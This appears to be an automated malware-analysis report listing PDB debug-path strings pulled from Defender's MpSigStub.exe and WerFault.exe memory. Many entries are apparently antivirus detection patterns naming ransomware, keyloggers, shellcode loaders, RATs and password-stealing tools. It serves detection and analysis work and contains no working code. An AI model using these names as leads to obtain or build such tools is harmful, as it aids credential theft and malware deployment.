Source:	Binary string: Slb.EP.Shell.pdb source: MpSigStub.exe, 00000024.00000003.6334856272.00000197A372A000.00000004.00000001.sdmp
Source:	Binary string: E@.+:\\Projects\\tidynet\\Release\\(selfdestruct\|tidynetwork).pdb source: MpSigStub.exe, 00000024.00000003.6437085765.00000197A4B7D000.00000004.00000001.sdmp
Source:	Binary string: EFRE65.pdb source: MpSigStub.exe, 00000024.00000003.6335436052.00000197A3016000.00000004.00000001.sdmp
Source:	Binary string: !#HSTR:PossiblyClean:magottei.pdb.A source: MpSigStub.exe, 00000024.00000003.6280960340.00000197A4381000.00000004.00000001.sdmp
Source:	Binary string: C>s:\\dEVELOPMdNT\\dC\+\+dCdyptordEvoldtiod_dld\\release\\m.pdb source: MpSigStub.exe, 00000024.00000003.6430077076.00000197A46D9000.00000004.00000001.sdmp
Source:	Binary string: lIFdrGkmBePss.pdb source: MpSigStub.exe, 00000024.00000003.6430707943.00000197A4B3C000.00000004.00000001.sdmp
Source:	Binary string: CryARr.pdb source: MpSigStub.exe, 00000024.00000003.6428495405.00000197A2E93000.00000004.00000001.sdmp
Source:	Binary string: FreeDownloadmanager\obj\x86\Debug\FreeDownloadManager.pdb source: MpSigStub.exe, 00000024.00000003.6345553259.00000197A36F1000.00000004.00000001.sdmp
Source:	Binary string: KSLDriver.pdbGCTL source: MpSigStub.exe, 00000024.00000003.6250246107.0000019795224000.00000004.00000001.sdmp
Source:	Binary string: boteg.pdbxL source: MpSigStub.exe, 00000024.00000003.6313066347.00000197A4615000.00000004.00000001.sdmp
Source:	Binary string: zYAamTGB2rfW!Cp+aR.pdb source: MpSigStub.exe, 00000024.00000003.6428495405.00000197A2E93000.00000004.00000001.sdmp
Source:	Binary string: D:\program z visuala\keylogger\Release\keylogger.pdb source: MpSigStub.exe, 00000024.00000003.6435320664.00000197A4AB7000.00000004.00000001.sdmp
Source:	Binary string: \GetWinPsw.pdb source: MpSigStub.exe, 00000024.00000003.6311649432.00000197A38AA000.00000004.00000001.sdmp
Source:	Binary string: \\WOO\\HT\\HT Server\\.+\.pdb source: MpSigStub.exe, 00000024.00000003.6288205941.00000197A4D62000.00000004.00000001.sdmp
Source:	Binary string: SAVService.pdb source: MpSigStub.exe, 00000024.00000003.6334856272.00000197A372A000.00000004.00000001.sdmp
Source:	Binary string: \bin\winfdmscheme.pdb source: MpSigStub.exe, 00000024.00000003.6348335236.00000197A3259000.00000004.00000001.sdmp
Source:	Binary string: zC:\Users\EchoHackCmd\source\repos\Minecraft_DLL_Injector\Minecraft_DLL_Injector\obj\x64\Release\Minecraft_DLL_Injector.pdb source: MpSigStub.exe, 00000024.00000003.6303735122.00000197A3500000.00000004.00000001.sdmp
Source:	Binary string: 7laIR+\|.XJ5aA0aa.pdb source: MpSigStub.exe, 00000024.00000003.6428495405.00000197A2E93000.00000004.00000001.sdmp
Source:	Binary string: wevtutil.pdb source: MpSigStub.exe, 00000024.00000003.6303735122.00000197A3500000.00000004.00000001.sdmp
Source:	Binary string: C:\\Users\\Lucca\\AppData\\Local\\Temp\\.*\.pdb source: MpSigStub.exe, 00000024.00000003.6303735122.00000197A3500000.00000004.00000001.sdmp
Source:	Binary string: \isn.pdb source: MpSigStub.exe, 00000024.00000003.6434542406.00000197A437F000.00000004.00000001.sdmp
Source:	Binary string: Wizzlabs\windows\Newtonsoft.Json\obj\Release\Newtonsoft.Json.pdb source: MpSigStub.exe, 00000024.00000003.6329696621.00000197A4DE7000.00000004.00000001.sdmp
Source:	Binary string: \Ransomware2.0.pdb source: MpSigStub.exe, 00000024.00000003.6437415503.00000197A38EC000.00000004.00000001.sdmp
Source:	Binary string: ToolbarCore\toolbar\ie\src\toolbar\wrapper\Release\externalwrapper.pdbx source: MpSigStub.exe, 00000024.00000003.6351148277.00000197A49F2000.00000004.00000001.sdmp
Source:	Binary string: C:\\Users\\john\\Documents\\Visual Studio 2008\\Projects\\EncryptFile.\\.\\EncryptFile.exe.pdb source: MpSigStub.exe, 00000024.00000003.6280960340.00000197A4381000.00000004.00000001.sdmp
Source:	Binary string: ucrtbase.pdb( source: WerFault.exe, 00000005.00000003.2857096900.0000000005434000.00000004.00000001.sdmp
Source:	Binary string: \DownloaderMain\DownloaderDll.pdb source: MpSigStub.exe, 00000024.00000003.6326497821.00000197A3203000.00000004.00000001.sdmp
Source:	Binary string: \rANSOM\rANSOM\obj\Sanyasteakler\rANSOM.pdb source: MpSigStub.exe, 00000024.00000003.6429813058.00000197A4697000.00000004.00000001.sdmp
Source:	Binary string: \Visual Studio 2010\Projects\installer4\installer\obj\x86\Release\installer.pdbxx source: MpSigStub.exe, 00000024.00000003.6313066347.00000197A4615000.00000004.00000001.sdmp
Source:	Binary string: megasync.pdb source: MpSigStub.exe, 00000024.00000003.6340102815.00000197A329B000.00000004.00000001.sdmp
Source:	Binary string: \\wininet_fr_20200212\\.+\\?dlln\.pdb source: MpSigStub.exe, 00000024.00000003.6350622822.00000197A3F60000.00000004.00000001.sdmp
Source:	Binary string: msoert2.pdb3 source: MpSigStub.exe, 00000024.00000003.6279973273.00000197A4489000.00000004.00000001.sdmp
Source:	Binary string: (vbsedit_source\x64\Release\mywscript.pdb source: MpSigStub.exe, 00000024.00000003.6317535190.00000197A4F30000.00000004.00000001.sdmp
Source:	Binary string: csgoInjector.pdb source: MpSigStub.exe, 00000024.00000003.6308253805.00000197A3EDD000.00000004.00000001.sdmp
Source:	Binary string: api-ms-win-core-console-l1-1-0.pdb source: MpSigStub.exe, 00000024.00000003.6279973273.00000197A4489000.00000004.00000001.sdmp
Source:	Binary string: vga256.pdb source: MpSigStub.exe, 00000024.00000003.6304100006.00000197A2F93000.00000004.00000001.sdmp
Source:	Binary string: \output\MinSizeRel\updrem.pdb] source: MpSigStub.exe, 00000024.00000003.6323790490.00000197A4866000.00000004.00000001.sdmp
Source:	Binary string: kernel32.pdb source: MpSigStub.exe, 00000024.00000003.6331200392.00000197A38EC000.00000004.00000001.sdmp
Source:	Binary string: x:\Dev_CPP\Work\VS_KnzStr_Adware\Release\VS_Work1.pdbx source: MpSigStub.exe, 00000024.00000003.6318199174.00000197A3059000.00000004.00000001.sdmp
Source:	Binary string: \\WOO\\HT\\.+Server.+\.pdb source: MpSigStub.exe, 00000024.00000003.6330297949.00000197A369B000.00000004.00000001.sdmp
Source:	Binary string: d:\build.obj.x86fre\amcore\mpengine\mavutils\source\sigutils\vfilesystem\files\ncpa\objfre\i386\ncpa.pdb0 source: MpSigStub.exe, 00000024.00000003.6312003576.00000197A3DD5000.00000004.00000001.sdmp
Source:	Binary string: winscard.pdb source: MpSigStub.exe, 00000024.00000003.6318964208.00000197A48A9000.00000004.00000001.sdmp
Source:	Binary string: stscast.pdb source: MpSigStub.exe, 00000024.00000003.6277859035.00000197A392F000.00000004.00000001.sdmp
Source:	Binary string: m:\VP\QM\trunk\output\Recorder.pdb source: MpSigStub.exe, 00000024.00000003.6276556833.00000197A3CCB000.00000004.00000001.sdmp
Source:	Binary string: bin\Release\LiveUpdateWPP.pdbxd source: MpSigStub.exe, 00000024.00000003.6306392748.00000197A44CA000.00000004.00000001.sdmp
Source:	Binary string: ^shell\BATLE_SOURCE\SampleService_run_shellcode_from-memory10-02-2016\Release\SampleService.pdb source: MpSigStub.exe, 00000024.00000003.6291090515.00000197A33E4000.00000004.00000001.sdmp
Source:	Binary string: \Visual Studio 2010\Projects\installer4\installer\obj\x86\Release\installer.pdb source: MpSigStub.exe, 00000024.00000003.6313066347.00000197A4615000.00000004.00000001.sdmp
Source:	Binary string: \InstallGoogleToolBar\InstallGoogleToolBar\obj\Debug\InstallGoogleToolBar.pdb source: MpSigStub.exe, 00000024.00000003.6431842764.00000197A4D63000.00000004.00000001.sdmp
Source:	Binary string: \Release\shellcode.pdb source: MpSigStub.exe, 00000024.00000003.6280960340.00000197A4381000.00000004.00000001.sdmp
Source:	Binary string: advapi32.pdb( source: WerFault.exe, 00000005.00000003.2857984455.000000000543A000.00000004.00000001.sdmp, WerFault.exe, 00000009.00000003.2918468716.00000000030C6000.00000004.00000001.sdmp
Source:	Binary string: \Current\wear.pdb source: MpSigStub.exe, 00000024.00000003.6271076584.00000197A3A37000.00000004.00000001.sdmp
Source:	Binary string: PCSUQuickScan.pdb source: MpSigStub.exe, 00000024.00000003.6342863444.00000197A4F72000.00000004.00000001.sdmp
Source:	Binary string: hWEHW#@HJERKJERJER^$.Pdb source: MpSigStub.exe, 00000024.00000003.6428495405.00000197A2E93000.00000004.00000001.sdmp
Source:	Binary string: e:\caoe.PDBa source: MpSigStub.exe, 00000024.00000003.6348335236.00000197A3259000.00000004.00000001.sdmp
Source:	Binary string: \yacdl\Release\yacdl.pdb source: MpSigStub.exe, 00000024.00000003.6291492327.00000197A37E5000.00000004.00000001.sdmp
Source:	Binary string: Krypton\source\repos\UAC\UAC\obj\Release\UAC.pdb source: MpSigStub.exe, 00000024.00000003.6434542406.00000197A437F000.00000004.00000001.sdmp
Source:	Binary string: mpengine.pdb source: MpSigStub.exe, 00000024.00000003.6250246107.0000019795224000.00000004.00000001.sdmp
Source:	Binary string: wrpcrt4.pdb( source: WerFault.exe, 00000009.00000003.2920056243.00000000030D7000.00000004.00000001.sdmp
Source:	Binary string: wrpcrt4.pdb* source: WerFault.exe, 00000009.00000003.2962082422.00000000051D9000.00000004.00000040.sdmp
Source:	Binary string: c:\miniprojects\x86il\il86\x64\release\IL86.pdb source: MpSigStub.exe, 00000024.00000003.6354030665.00000197A41B3000.00000004.00000001.sdmp
Source:	Binary string: XrfZPp2C.pdb source: MpSigStub.exe, 00000024.00000003.6428495405.00000197A2E93000.00000004.00000001.sdmp
Source:	Binary string: UsoCoreWorker.pdb source: MpSigStub.exe, 00000024.00000003.6289251468.00000197A3F1F000.00000004.00000001.sdmp
Source:	Binary string: _sa\bin\Release\ClientSAHook.pdb source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp
Source:	Binary string: w:\work\vcprj\prj\downloader\Release\injdldr.pdb source: MpSigStub.exe, 00000024.00000003.6293664511.00000197A3192000.00000004.00000001.sdmp
Source:	Binary string: c:\To\In\All\With\Within\Value.pdb source: MpSigStub.exe, 00000024.00000003.6312336240.00000197A3E16000.00000004.00000001.sdmp
Source:	Binary string: api-ms-win-core-localization-l1-2-0.pdb source: MpSigStub.exe, 00000024.00000003.6338261504.00000197A4590000.00000004.00000001.sdmp
Source:	Binary string: security.pdb source: MpSigStub.exe, 00000024.00000003.6323790490.00000197A4866000.00000004.00000001.sdmp
Source:	Binary string: d:\build.obj.x86fre\amcore\mpengine\mavutils\source\sigutils\vfilesystem\files\w32tm\objfre\i386\w32tm.pdb0 source: MpSigStub.exe, 00000024.00000003.6312336240.00000197A3E16000.00000004.00000001.sdmp
Source:	Binary string: \\MoonRat_Develop\\.+\\obj\\Release\\.+\.pdb source: MpSigStub.exe, 00000024.00000003.6274276311.00000197A2E51000.00000004.00000001.sdmp
Source:	Binary string: \bin\Release.Minimal\officer.pdb source: MpSigStub.exe, 00000024.00000003.6296880704.00000197A4AB8000.00000004.00000001.sdmp
Source:	Binary string: C:\src\similar\clients\our\new_bundler\nsis_plugins\plugins\safed.pdb source: MpSigStub.exe, 00000024.00000003.6288538370.00000197A46DA000.00000004.00000001.sdmp
Source:	Binary string: unknowndll.pdbaT source: MpSigStub.exe, 00000024.00000003.6317535190.00000197A4F30000.00000004.00000001.sdmp
Source:	Binary string: LiuLiangBao\Release\LiuLiangBao.pdb source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp
Source:	Binary string: \InstallerMainV6_Yrrehs\Release\Main.pdb source: MpSigStub.exe, 00000024.00000003.6352999953.00000197A3469000.00000004.00000001.sdmp
Source:	Binary string: adptif.pdb3 source: MpSigStub.exe, 00000024.00000003.6342863444.00000197A4F72000.00000004.00000001.sdmp
Source:	Binary string: \Conduit\RnD\Client\IE\Dev\6.16\6.16.1\Release\hk64tbedrs.pdb source: MpSigStub.exe, 00000024.00000003.6283020613.00000197A471D000.00000004.00000001.sdmp
Source:	Binary string: D:\yo\chaos\Release\chaos.pdb source: MpSigStub.exe, 00000024.00000003.6438240606.00000197A36DD000.00000004.00000001.sdmp
Source:	Binary string: nafde.pdb source: MpSigStub.exe, 00000024.00000003.6306392748.00000197A44CA000.00000004.00000001.sdmp
Source:	Binary string: .+\\WormWin32 Poenon.+\\.+.pdb source: MpSigStub.exe, 00000024.00000003.6330297949.00000197A369B000.00000004.00000001.sdmp
Source:	Binary string: autofmt.pdb source: MpSigStub.exe, 00000024.00000003.6356519621.00000197A36DC000.00000004.00000001.sdmp
Source:	Binary string: PoolMonPlugin.pdb source: MpSigStub.exe, 00000024.00000003.6339573341.00000197A3E6C000.00000004.00000001.sdmp
Source:	Binary string: TuneUpUtilitiesApp32.pdb source: MpSigStub.exe, 00000024.00000003.6339573341.00000197A3E6C000.00000004.00000001.sdmp
Source:	Binary string: sxs.pdbj source: WerFault.exe, 00000009.00000003.2962082422.00000000051D9000.00000004.00000040.sdmp
Source:	Binary string: d:\pavbld\amcore\Signature\Source\sigutils\vdlls\Microsoft.NET\VFramework\mscorlib\mscorlib.pdb source: MpSigStub.exe, 00000024.00000003.6342863444.00000197A4F72000.00000004.00000001.sdmp
Source:	Binary string: sfc.pdb source: MpSigStub.exe, 00000024.00000003.6291492327.00000197A37E5000.00000004.00000001.sdmp
Source:	Binary string: \Projects\FlashPlayerPlugin\FlashPlayerPlugin\obj\Release\FlashPlayerPlugin.pdb source: MpSigStub.exe, 00000024.00000003.6282020026.00000197A450D000.00000004.00000001.sdmp
Source:	Binary string: Uc:\Users\Main\Desktop\PackagingModule\PackagingModule\obj\Release\PackagingModule.pdb] source: MpSigStub.exe, 00000024.00000003.6434542406.00000197A437F000.00000004.00000001.sdmp
Source:	Binary string: AWInstaller.pdb source: MpSigStub.exe, 00000024.00000003.6274276311.00000197A2E51000.00000004.00000001.sdmp
Source:	Binary string: msvcp_win.pdb( source: WerFault.exe, 00000005.00000003.2855994969.00000000029B0000.00000004.00000001.sdmp, WerFault.exe, 00000009.00000003.2919220866.00000000030BB000.00000004.00000001.sdmp
Source:	Binary string: HookPasswordReset.pdb source: MpSigStub.exe, 00000024.00000003.6334856272.00000197A372A000.00000004.00000001.sdmp
Source:	Binary string: padcryptUninstaller\obj\Debug\padcryptUninstaller.pdb source: MpSigStub.exe, 00000024.00000003.6294257169.00000197A398C000.00000004.00000001.sdmp
Source:	Binary string: c:\Prepare\Control\Work\box\heard.pdb source: MpSigStub.exe, 00000024.00000003.6437789522.00000197A392D000.00000004.00000001.sdmp
Source:	Binary string: PassView.pdb source: MpSigStub.exe, 00000024.00000003.6305465801.00000197A4278000.00000004.00000001.sdmp
Source:	Binary string: e:\mpengine\amcore\MpEngine\mavutils\Source\sigutils\vdlls\Microsoft.NET\VFramework\System.Xml\System.Xml.pdb source: MpSigStub.exe, 00000024.00000003.6290858289.00000197A33BE000.00000004.00000001.sdmp
Source:	Binary string: Ransom:MSIL/Cryptolocker.PDB!MTB source: MpSigStub.exe, 00000024.00000003.6438683964.00000197A371E000.00000004.00000001.sdmp
Source:	Binary string: tdc.pdb3 source: MpSigStub.exe, 00000024.00000003.6291492327.00000197A37E5000.00000004.00000001.sdmp
Source:	Binary string: msoert2.pdb source: MpSigStub.exe, 00000024.00000003.6279973273.00000197A4489000.00000004.00000001.sdmp
Source:	Binary string: Tokenvator.pdb source: MpSigStub.exe, 00000024.00000003.6441079311.00000197A4E6A000.00000004.00000001.sdmp
Source:	Binary string: I \\WOO\\HT\\AD_Attacker\\.+\.pdb source: MpSigStub.exe, 00000024.00000003.6288205941.00000197A4D62000.00000004.00000001.sdmp
Source:	Binary string: d:\build.obj.x86fre\amcore\mpengine\mavutils\source\sigutils\vfilesystem\files\finger\objfre\i386\finger.pdb source: MpSigStub.exe, 00000024.00000003.6303735122.00000197A3500000.00000004.00000001.sdmp
Source:	Binary string: D:\DevPatch\_FINAL\Bin\MapleStory.pdbx source: MpSigStub.exe, 00000024.00000003.6323790490.00000197A4866000.00000004.00000001.sdmp
Source:	Binary string: \iSafe\trunk\bin\iSafeSvc2.pdb source: MpSigStub.exe, 00000024.00000003.6313066347.00000197A4615000.00000004.00000001.sdmp
Source:	Binary string: dfsfgjfgdes.pdb source: MpSigStub.exe, 00000024.00000003.6335436052.00000197A3016000.00000004.00000001.sdmp
Source:	Binary string: nanamnana\obj\Debug\nanamnana.pdbx source: MpSigStub.exe, 00000024.00000003.6327908307.00000197A40EC000.00000004.00000001.sdmp
Source:	Binary string: L6\\spam\\export_email_outlook\\cpp\\.*\\export..x\.pdb source: MpSigStub.exe, 00000024.00000003.6288205941.00000197A4D62000.00000004.00000001.sdmp
Source:	Binary string: \Akl\kh\Release\kh.pdb source: MpSigStub.exe, 00000024.00000003.6336985744.00000197A3426000.00000004.00000001.sdmp
Source:	Binary string: \Release\initialexe\torch.exe.pdb source: MpSigStub.exe, 00000024.00000003.6348335236.00000197A3259000.00000004.00000001.sdmp
Source:	Binary string: dsquery.pdb source: MpSigStub.exe, 00000024.00000003.6317535190.00000197A4F30000.00000004.00000001.sdmp
Source:	Binary string: d:\workspace\ebclient\dmsetup\dmsched2\Release\dmsched2.pdbx source: MpSigStub.exe, 00000024.00000003.6310450817.00000197A4AFA000.00000004.00000001.sdmp
Source:	Binary string: \ExtractedBundle\RTM_ImageModRec_1.1.5.0_x64\RTM_ImageModRec.pdb source: MpSigStub.exe, 00000024.00000003.6436704102.00000197A4AFA000.00000004.00000001.sdmp
Source:	Binary string: wgdi32.pdb source: WerFault.exe, 00000005.00000003.2856883159.00000000029A5000.00000004.00000001.sdmp, WerFault.exe, 00000009.00000003.2962000837.00000000051D0000.00000004.00000040.sdmp
Source:	Binary string: dxva2.pdb3 source: MpSigStub.exe, 00000024.00000003.6271796009.00000197A32DD000.00000004.00000001.sdmp
Source:	Binary string: -\BetterInstaller\Release\BetterInstaller.pdb source: MpSigStub.exe, 00000024.00000003.6312003576.00000197A3DD5000.00000004.00000001.sdmp
Source:	Binary string: (d:\p\loser\a\a\objfre_wxp_x86\i386\A.pdb source: MpSigStub.exe, 00000024.00000003.6436704102.00000197A4AFA000.00000004.00000001.sdmp
Source:	Binary string: \\spam\\export_email_outlook\\cpp\\.*\\export..x\.pdb source: MpSigStub.exe, 00000024.00000003.6288205941.00000197A4D62000.00000004.00000001.sdmp
Source:	Binary string: D:\code\ccminer\Release\x64\ccminer.pdb source: MpSigStub.exe, 00000024.00000003.6274276311.00000197A2E51000.00000004.00000001.sdmp
Source:	Binary string: D:\tortoiseSVN\nsc5\bin\Release\nssock2.pdbd source: MpSigStub.exe, 00000024.00000003.6430342028.00000197A4BC0000.00000004.00000001.sdmp
Source:	Binary string: subst.pdb source: MpSigStub.exe, 00000024.00000003.6312336240.00000197A3E16000.00000004.00000001.sdmp
Source:	Binary string: \BaseFlash.pdb source: MpSigStub.exe, 00000024.00000003.6269788057.00000197A4C44000.00000004.00000001.sdmp
Source:	Binary string: schtasks.pdbd source: MpSigStub.exe, 00000024.00000003.6277859035.00000197A392F000.00000004.00000001.sdmp
Source:	Binary string: Win32\Release\Sdrsrv.pdb source: MpSigStub.exe, 00000024.00000003.6439501262.00000197A4A33000.00000004.00000001.sdmp
Source:	Binary string: Cryptor_noVSSnoPers.pdb source: MpSigStub.exe, 00000024.00000003.6428495405.00000197A2E93000.00000004.00000001.sdmp
Source:	Binary string: \Release\SSEngine.pdb source: MpSigStub.exe, 00000024.00000003.6303130875.00000197A4DA4000.00000004.00000001.sdmp
Source:	Binary string: C:\mainProduct(old)\x86_bild_cryptor\shell_gen\Release\data_protect2.pdb source: MpSigStub.exe, 00000024.00000003.6431842764.00000197A4D63000.00000004.00000001.sdmp
Source:	Binary string: d:\build.obj.x86chk\amcore\mpengine\mavutils\source\sigutils\vfilesystem\files\lodctr\objchk\i386\lodctr.pdb source: MpSigStub.exe, 00000024.00000003.6415513577.00000197A3D91000.00000004.00000001.sdmp
Source:	Binary string: Archer_Add_Packet\Release\Packet.pdb source: MpSigStub.exe, 00000024.00000003.6291492327.00000197A37E5000.00000004.00000001.sdmp
Source:	Binary string: \tcrypt\Release\s_low.pdbx source: MpSigStub.exe, 00000024.00000003.6342863444.00000197A4F72000.00000004.00000001.sdmp
Source:	Binary string: \R980\Release\R980.pdb source: MpSigStub.exe, 00000024.00000003.6439501262.00000197A4A33000.00000004.00000001.sdmp
Source:	Binary string: P'Deamon-dll.*\\Release\\Deamon-dll\.pdb source: MpSigStub.exe, 00000024.00000003.6350622822.00000197A3F60000.00000004.00000001.sdmp
Source:	Binary string: M(\\qbot_debugger\\.+\\qbot_debugger\.pdb source: MpSigStub.exe, 00000024.00000003.6288205941.00000197A4D62000.00000004.00000001.sdmp
Source:	Binary string: KSLD.pdbGCTL source: MpSigStub.exe, 00000024.00000003.6250246107.0000019795224000.00000004.00000001.sdmp
Source:	Binary string: freefilesync_x64.pdb source: MpSigStub.exe, 00000024.00000003.6334856272.00000197A372A000.00000004.00000001.sdmp
Source:	Binary string: \T+M\Result\DocPrint.pdb] source: MpSigStub.exe, 00000024.00000003.6436704102.00000197A4AFA000.00000004.00000001.sdmp
Source:	Binary string: \13930308\Bot_70_FIX HEADER_FIX_LONGURL 73_StableAndNewProtocol - login all\Release\Bot.pdb source: MpSigStub.exe, 00000024.00000003.6430077076.00000197A46D9000.00000004.00000001.sdmp
Source:	Binary string: \Release\mailermodule199.pdb source: MpSigStub.exe, 00000024.00000003.6440424598.00000197A4487000.00000004.00000001.sdmp
Source:	Binary string: P)E:\\Production\\Tool-Developing\\.+\.pdb source: MpSigStub.exe, 00000024.00000003.6350622822.00000197A3F60000.00000004.00000001.sdmp
Source:	Binary string: msvfw32.pdb( source: WerFault.exe, 00000005.00000003.2861476094.0000000005D6A000.00000004.00000001.sdmp, WerFault.exe, 00000009.00000003.2927187876.000000000617A000.00000004.00000001.sdmp
Source:	Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb source: MpSigStub.exe, 00000024.00000003.6283505070.00000197A475E000.00000004.00000001.sdmp
Source:	Binary string: d:\74\55\Child\Require\bank\Bear\rather\66\Boy\front\special\straight\wood\1\guide.pdb source: MpSigStub.exe, 00000024.00000003.6289251468.00000197A3F1F000.00000004.00000001.sdmp
Source:	Binary string: KSLD.pdb source: MpSigStub.exe, 00000024.00000003.6250246107.0000019795224000.00000004.00000001.sdmp
Source:	Binary string: \wyvernlocker.pdb source: MpSigStub.exe, 00000024.00000003.6438240606.00000197A36DD000.00000004.00000001.sdmp
Source:	Binary string: \SecurityService\SecurityService\obj\Release\WindowsSecurityService.pdb source: MpSigStub.exe, 00000024.00000003.6439967654.00000197A4446000.00000004.00000001.sdmp
Source:	Binary string: cryptdll.pdb source: MpSigStub.exe, 00000024.00000003.6279973273.00000197A4489000.00000004.00000001.sdmp
Source:	Binary string: reg.pdbd source: MpSigStub.exe, 00000024.00000003.6317535190.00000197A4F30000.00000004.00000001.sdmp
Source:	Binary string: 2gerGW@4herhw*9283y4huWO.pdb] source: MpSigStub.exe, 00000024.00000003.6430707943.00000197A4B3C000.00000004.00000001.sdmp
Source:	Binary string: D:\Projekty\EvulSoft\TibiSavePass\Programy\Stub VISUAL\Release\Stub VISUAL.pdb source: MpSigStub.exe, 00000024.00000003.6439090002.00000197A49F2000.00000004.00000001.sdmp
Source:	Binary string: wwin32u.pdbz~ source: WerFault.exe, 00000005.00000003.2881791538.00000000049A2000.00000004.00000040.sdmp
Source:	Binary string: !#HSTR:Win32/sfxrar.pdb.A source: MpSigStub.exe, 00000024.00000003.6280960340.00000197A4381000.00000004.00000001.sdmp
Source:	Binary string: !6zyA6@267=HPS.C\|dMqd4-qaN\|yjm.pdb source: MpSigStub.exe, 00000024.00000003.6430707943.00000197A4B3C000.00000004.00000001.sdmp
Source:	Binary string: eTiq_WaEN__y9F89zLukjmM.pdbx source: MpSigStub.exe, 00000024.00000003.6428495405.00000197A2E93000.00000004.00000001.sdmp
Source:	Binary string: pid.pdb3 source: MpSigStub.exe, 00000024.00000003.6313066347.00000197A4615000.00000004.00000001.sdmp
Source:	Binary string: @.pdb source: MpSigStub.exe, 00000024.00000003.6312003576.00000197A3DD5000.00000004.00000001.sdmp
Source:	Binary string: \b\Ship\Win32\VideoProjectsLauncher\VideoProjectsLauncher.pdb source: MpSigStub.exe, 00000024.00000003.6329696621.00000197A4DE7000.00000004.00000001.sdmp
Source:	Binary string: HSTR:Win32/sfxrar.pdb.A source: MpSigStub.exe, 00000024.00000003.6321843775.00000197A2FD4000.00000004.00000001.sdmp
Source:	Binary string: vssadmin.pdb source: MpSigStub.exe, 00000024.00000003.6320871262.00000197A4180000.00000004.00000001.sdmp
Source:	Binary string: ciTfDCxMQU0a5/DDEyGwn8ta.z4.pdb source: MpSigStub.exe, 00000024.00000003.6428495405.00000197A2E93000.00000004.00000001.sdmp
Source:	Binary string: r:\rel\iMS-srvreg56.pdb source: MpSigStub.exe, 00000024.00000003.6280199077.00000197A44B4000.00000004.00000001.sdmp
Source:	Binary string: Kernel.Appcore.pdb source: WerFault.exe, 00000005.00000003.2859676804.00000000054EC000.00000004.00000001.sdmp, WerFault.exe, 00000009.00000003.2922725864.0000000006136000.00000004.00000001.sdmp
Source:	Binary string: 50G:\\combustion\\aiding\\breaching\\stooping.pdb source: MpSigStub.exe, 00000024.00000003.6285606128.00000197A309B000.00000004.00000001.sdmp
Source:	Binary string: msnetobj.pdb3 source: MpSigStub.exe, 00000024.00000003.6327431635.00000197A37A2000.00000004.00000001.sdmp
Source:	Binary string: \Release\Cloudy.pdb] source: MpSigStub.exe, 00000024.00000003.6439501262.00000197A4A33000.00000004.00000001.sdmp
Source:	Binary string: lsasrv.pdb source: MpSigStub.exe, 00000024.00000003.6339573341.00000197A3E6C000.00000004.00000001.sdmp
Source:	Binary string: api-ms-win-core-comm-l1-1-0.pdb source: MpSigStub.exe, 00000024.00000003.6279973273.00000197A4489000.00000004.00000001.sdmp
Source:	Binary string: llq001\src\out\Official\UpdateChecker.exe.pdb source: MpSigStub.exe, 00000024.00000003.6341224894.00000197A35D4000.00000004.00000001.sdmp
Source:	Binary string: fA\\win\\build\\src\\build\\Release\\chrome_frame_helper\.exe\.pdb source: MpSigStub.exe, 00000024.00000003.6298561221.00000197A4380000.00000004.00000001.sdmp
Source:	Binary string: C:\Proyectos\desktop_apps\Updater\UpdaterVittalia\obj\Release\UpdaterService.pdb source: MpSigStub.exe, 00000024.00000003.6313066347.00000197A4615000.00000004.00000001.sdmp
Source:	Binary string: \ransom.pdb source: MpSigStub.exe, 00000024.00000003.6429813058.00000197A4697000.00000004.00000001.sdmp
Source:	Binary string: K8MiniPage.pdb source: MpSigStub.exe, 00000024.00000003.6335436052.00000197A3016000.00000004.00000001.sdmp
Source:	Binary string: PELoader.pdb source: MpSigStub.exe, 00000024.00000003.6316460209.00000197A40AB000.00000004.00000001.sdmp
Source:	Binary string: _darkshell\i386\DarkShell.pdb] source: MpSigStub.exe, 00000024.00000003.6430077076.00000197A46D9000.00000004.00000001.sdmp
Source:	Binary string: Session.*\\Release\\GenIt\.pdb source: MpSigStub.exe, 00000024.00000003.6288205941.00000197A4D62000.00000004.00000001.sdmp
Source:	Binary string: d:\\MODULOS\\PROJETO BATMAN\\Loaders\\Loader C# Crypter .* LINK .*\\obj\\x86\\Debug\\golfzinho.pdb source: MpSigStub.exe, 00000024.00000003.6439967654.00000197A4446000.00000004.00000001.sdmp
Source:	Binary string: msvfw32.pdb` source: MpSigStub.exe, 00000024.00000003.6312336240.00000197A3E16000.00000004.00000001.sdmp
Source:	Binary string: x:\werdon.pdb source: MpSigStub.exe, 00000024.00000003.6433381009.00000197A3C87000.00000004.00000001.sdmp
Source:	Binary string: \release\LSASecretsView.pdbx source: MpSigStub.exe, 00000024.00000003.6305465801.00000197A4278000.00000004.00000001.sdmp
Source:	Binary string: [cC]:\\Project(s)?\\ATLResDLL\\release\\AtlResDllR(es)?\.pdb source: MpSigStub.exe, 00000024.00000003.6298561221.00000197A4380000.00000004.00000001.sdmp
Source:	Binary string: #CNC Plugins Tools\ProgFactory_d.pdb source: MpSigStub.exe, 00000024.00000003.6320871262.00000197A4180000.00000004.00000001.sdmp
Source:	Binary string: SelfMother\SeaFriend\SmallStore\save.pdb source: MpSigStub.exe, 00000024.00000003.6271076584.00000197A3A37000.00000004.00000001.sdmp
Source:	Binary string: *.pdb.\|!\VstsGitSourceIndex.exe source: MpSigStub.exe, 00000024.00000003.6275208330.0000019790C4D000.00000004.00000001.sdmp
Source:	Binary string: BrowserManager.pdbxx source: MpSigStub.exe, 00000024.00000003.6313066347.00000197A4615000.00000004.00000001.sdmp
Source:	Binary string: 'D:\code\ccminer\Release\x64\ccminer.pdb source: MpSigStub.exe, 00000024.00000003.6274276311.00000197A2E51000.00000004.00000001.sdmp
Source:	Binary string: F:\rdpscan\Bin\Release_logged\x64\rdpscan.pdb source: MpSigStub.exe, 00000024.00000003.6440763384.00000197A4E29000.00000004.00000001.sdmp
Source:	Binary string: 4G:\Work\Bison\BisonNewHNStubDll\Release\Goopdate.pdb] source: MpSigStub.exe, 00000024.00000003.6430707943.00000197A4B3C000.00000004.00000001.sdmp
Source:	Binary string: msvfw32.pdb source: WerFault.exe, 00000005.00000003.2861476094.0000000005D6A000.00000004.00000001.sdmp, WerFault.exe, 00000009.00000003.2962082422.00000000051D9000.00000004.00000040.sdmp, MpSigStub.exe, 00000024.00000003.6312336240.00000197A3E16000.00000004.00000001.sdmp
Source:	Binary string: hal.pdb source: MpSigStub.exe, 00000024.00000003.6320126679.00000197A4068000.00000004.00000001.sdmp
